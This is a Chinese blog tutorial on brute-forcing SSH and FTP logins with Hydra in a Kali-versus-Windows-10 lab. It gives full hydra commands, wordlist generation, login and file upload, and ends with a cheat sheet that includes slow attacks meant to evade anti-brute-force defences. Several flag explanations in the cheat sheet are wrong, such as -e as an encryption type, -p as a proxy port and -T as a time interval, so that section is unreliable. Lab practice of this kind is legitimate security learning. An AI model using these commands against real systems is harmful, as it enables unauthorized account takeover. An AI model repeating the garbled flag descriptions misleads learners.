Hydra九头蛇爆破

最新推荐文章于 2024-06-13 15:45:13 发布
最新推荐文章于 2024-06-13 15:45:13 发布
阅读量929 收藏 20
点赞数 27
文章标签: 低代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55553136/article/details/139100688
版权

Hydra九头蛇爆破

前期准备:

系统环境:KALI2024和Win10,在Vmware下使用

  • SSH(远程登录)爆破

1.开启SSH服务器

Win10上开启ssh

①点击开机键→设置

②单击应用

③点击管理可选功能

④检查是否存在OpenSSH服务器和OpenSSH客户端,不存在的话,点击添加功能,找到这俩,然后等待安装(大概需要5分钟),注:两个都需要安装,缺一不可

⑤cmd中输入net start sshd ,开启ssh服务

2. KALI上爆破

1)使用nmap查看靶机开启的端口

①在实验前需要先确保可以ping通靶机Win10

②使用nmap -sS 192.168.200.134 检查靶机开放的端口

2)用户和密码字典

①使用crunch自动生成字典

②手写用户字典

3)开始爆破Win10的SSH

使用命令:hydra -t 40  -L users.txt -P pass.txt ssh://192.168.200.134 -f

4)实现远程登录Win10

使用命令:ssh administrator@192.168.200.134

此时就在KALI上登录成功了

退出的话使用命令 exit

  • FTP爆破

1.Win10上开启FTP服务

1)安装FTP服务

点击控制面板→程序→启用或关闭Windows 功能 (然后按图中勾选的勾选)

2)设置IIS的FTP服雾1

①搜索IIS并且以管理员身份运行

②然后点开网站的下拉菜单→右键添加FTP站点

③输入站点名称和物理路径

④此时选择靶机的IP地址和端口号,以及勾选无SSL

⑤根据需要选择身份验证,建议选择基本,因为选择了匿名的话FTP登录时就不需要用密码就可以直接登录了

⑥设置FTP防火墙允许应用

按照:控制面板→系统和安全→Windows Defender 防火墙→允许的应用

路径一定要选择:C:\Windows\System32\svchost.exe

2.KALI上实现登录FTP上传下载Win10

1)扫描查看Win10的ftp端口是否开启

2)爆破Win10的ftp

使用命令: hydra -t 40  -l administrator -P pass.txt ftp://192.168.200.134 -f

  1. 实现FTP登录

①使用命令:ftp administrator@192.168.200.134

②put上传命令:put /root/pass.txt /password.txt

exit 退出ftp服务

3.检查是否上传成功

登录Win10,在文件目录行输入  ftp:192.168.200.134//

此时就可以看到我们刚刚从KALI上上传的文件里

总结:

Hydra是一款非常好用且适合小白上手的密码爆破工具,建议大家可以多练练,以下是常见的命令:

1.基本使用

hydra -l username -P password_file -t 4 target

这里 -l 指定了用户名(如果是字典攻击,则使用 -L),-P 指定了密码文件,-t 指定了并发线程数,target 是目标服务器的地址。

2.指定端口:

hydra -p password -e ns -s port target

-p 指定了密码,-e 指定了加密类型(ns 代表无密码或SSH的空密码),-s 指定了端口号。

3.使用用户名字典文件:

hydra -L user_file -p password -t 4 target

-L 指定了用户名字典文件,每个用户名占一行。

4.使用密码字典文件:

hydra -l username -P pass_file -t 4 target

-P 指定了密码字典文件。

5.指定服务类型:

hydra -l username -p password -S target -t 4 snmp

-S 表示使用SSL,snmp 指定了服务类型。

6.FTP 破解:

hydra -l username -p password ftp://target

7.SSH 破解:

hydra -l username -P pass_file ssh://target

8.HTTP 表单破解:
hydra -l username -P pass_file http://target/index.php

9.使用代理

hydra -l username -p password -p 8080 target

-p 后面直接跟代理端口号。

10.慢速攻击(避免触发防暴力破解机制):

hydra -l username -p password -T 1 target

-T 后面跟的是时间间隔(秒)。

11.显示详细过程:

hydra -l username -p password -v target

-v 表示显示详细模式。

12.使用特定嗅探模块:

hydra -M snmp://target -m 1 -o found.txt

-M 指定了模块文件,-m 指定了模块中的哪个嗅探模式使用,-o 指定了输出文件。

良~
关注
  • 27
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
九头安全测试工具(Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
端口渗透·网站渗透过程 --21 ,22,873,3306,6379,8080(8080端口是针对CMS的渗透)...
weixin_34362790的博客
06-04 2606
声明:文章渗透网站为模拟环境,文章只为利用过程 文章为信息收集和端口渗透两部分,21端口为ftp版本漏洞 8080端口为CMS的渗透 信息收集: ·使用扫描工具nmap ,PortScan 对整个网段进行扫描 信息:通过访问网站得到要测试...
应用协议安全:Hydra 端口爆破工具.(九头
网络安全领域___专研者.
05-16 3223
Hydra 也叫九头,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、SSH、FTP 等服务.
hydra 九头端口爆破
Grey的博客
12-30 8695
在安全中 最大的安全漏洞莫过于密码 本次文章来说一下 爆破在渗透测试中的用途 或许有些小伙伴在渗透测试中 找不到注入点 或者储存xss 等一系列的漏洞的时候会选择放弃 但是你们有没有想过 爆破在渗透测试中也有这巨大的用途
Hydra九头)弱口令爆破工具详解
依步_的专栏
06-10 8161
1、简介 hydra,中文名“九头”,弱口令暴力破解工具,开源,AGPLv3协议。该工具支持多种协议,也支持并行连接,并且经过测试可在 Linux、Windows/Cygwin、Solaris、FreeBSD/OpenBSD、QNX (Blackberry 10) 和 MacOS 上干净地编译。 目前该工具支持以下协议: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTT
九头hydra)密码爆破工具
m0_74025111的博客
10-15 267
#$%^&()-= -t 8 192.168.1.1 http-get / -l admin 为尝试破解的用户名。# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V。因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。HYDRA是著名组织THC的一款开源的暴力破解密码工具,其功能非常强大的。
Razer Hydra 九头体感游戏控制器驱动 v1.01 官方版
07-03
RazerHydra九头体感控制器驱动程序是由官方推出的一款手柄驱动程序,该驱动全面支持Windows的各个系统,安装驱动后用户可以进行各种设置,欢迎下载!RazerHydra九头体感控制器手感扳机键和摇杆的手感不错,...
hydra-antlia:九头的功能集合
05-22
用纯净的九头做几何图形的工作可能真的很乏味。 毕竟,Hydra的灵感来自于模拟模块化合成器。 在尝试在Hydra内绘制一些标记并意识到模拟信号的思维方式对于特定目标如此直观时,我开始了Antlia的工作。 我想多...
九头
02-19
九头 Hydra是最初在开发的分布式数据处理和存储系统。 它提取数据流(认为是日志文件),并构建树,这些树是数据的汇总,摘要或转换。 人们可以使用这些树来进行探索(小查询),作为机器学习管道的一部分(大查询...
hdcycles:周期九头代表
02-09
hdCycles(周期九头代表) ndrCycles(周期节点定义注册表) usdCycles(周期USD模式) 其中的前两个在此存储库中实现。 建造 要求 循环独立的库和标头 美元19.xx + 需要提供大多数美元要求(OpenSubdiv,PNG...
九头hydra爆破http示例
墨痕诉清风的博客
02-23 2996
简单,一看必会
OSCP-3-7-pyexpvm(hydra九头爆破mysql、fernet解密)
墨痕诉清风的博客
08-28 203
【代码】OSCP-3-7-pyexpvm(九头爆破mysql、fernet解密)
低代码开发:智能财务系统开发应用
dsgdauigfs的博客
06-11 563
低代码开发,作为一种创新的快速应用开发方法,近年来在业界引起了广泛关注。它旨在通过可视化建模和少量编码来加速应用程序的开发过程,为开发者带来了前所未有的便利与效率。这一革命性的技术不仅使得专业开发人员能够更高效地完成工作,同时也为非专业开发人员提供了参与应用程序开发的可能性,极大地提高了开发的灵活性和创新性。低代码开发的核心在于可视化建模。传统的应用开发过程中,开发者通常需要编写大量的代码来实现功能需求。然而,低代码平台提供了丰富的图形化界面和拖拽式组件,使得开发者能够通过简单的操作即可完成应用的构建。
低代码开发应用:国企数字化转型的思考与探索
kfashfasf的博客
06-11 957
在当今数字化时代,软件开发的需求日益增长,而传统的编程方式往往面临时间成本高、技术门槛高等问题。因此,低代码开发作为一种新型的软件开发方式,正逐渐受到越来越多企业和开发者的青睐。低代码开发,顾名思义,即是通过少量的代码甚至无需编写代码,通过图形化界面和预构建模块,快速构建应用程序的开发方式。其核心概念在于通过高度可视化的界面和丰富的预构建组件,降低开发的复杂性和门槛,使开发者能够更专注于业务逻辑和创新功能的实现。
低代码开发MES系统,一周实现数字化
peachzhang11的博客
06-13 637
万界星空科技低代码平台与MES的结合为智能制造领域带来了新的发展机遇和挑战。通过快速构建MES界面和功能、实现与其他信息系统的连接和协同以及支持二次开发和功能扩展等特点,低代码平台为制造业的数字化转型提供了有力支持。
鸿蒙低代码开发的局限性
jimoduwu的专栏
06-11 225
解决方案:将所有的visual文件转换成ets代码。这样其实就不叫低代码开发了,只是用低代码插件绘制了UI而已。2、低代码插件没有空白的自定义组件,当前提供的所谓自定义组件,只能用列表中提供的组件来拼接新的组件。4、低代码Tabs和TabContent控件,无法设置TabBar字体的大小颜色等。3、使用ets代码自定义的组件,在低代码插件中不识别,所以也无法引入并使用。1、低代码插件没有WebView组件。
软设之敏捷方法
2301_81968528的博客
06-13 250
自适应软件开发 特点:核心是三个非线性的,重叠的开发阶段:猜测,合作和学习。水晶法 特点:认为每一个不同的项目都需要一套不同的策略,约定和方法论,认为人对软件质量有重要影响,因此随着项目质量和开发人员素质提高,项目和过程的质量也随之提高。并列争球法 特点:把每30天一次的迭代称为一个“冲刺”,并按需求的优先级来实现产品。敏捷方法的总体目标是通过尽可能早地,持续地对有价值的软黏的交付,使客户满意。重构:重新审视需求和设计,重新明确地描述它们以符合新的和现有的需求。简单设计:只处理当前的需求,使设计保持简单。
操作系统期末复习笔记!
06-13
操作系统期末复习笔记
pyzmq-22.0.0-cp38-cp38-manylinux2010_i686.whl
最新发布
06-13
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
hydra爆破mysql
04-27
下面是使用Hydra进行MySQL爆破的一般步骤: 1. 安装Hydra:首先需要在你的系统上安装Hydra。你可以从Hydra的官方网站或者其他可靠的资源中获取安装包,并按照指示进行安装。 2. 确定目标:确定你要进行爆破的MySQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值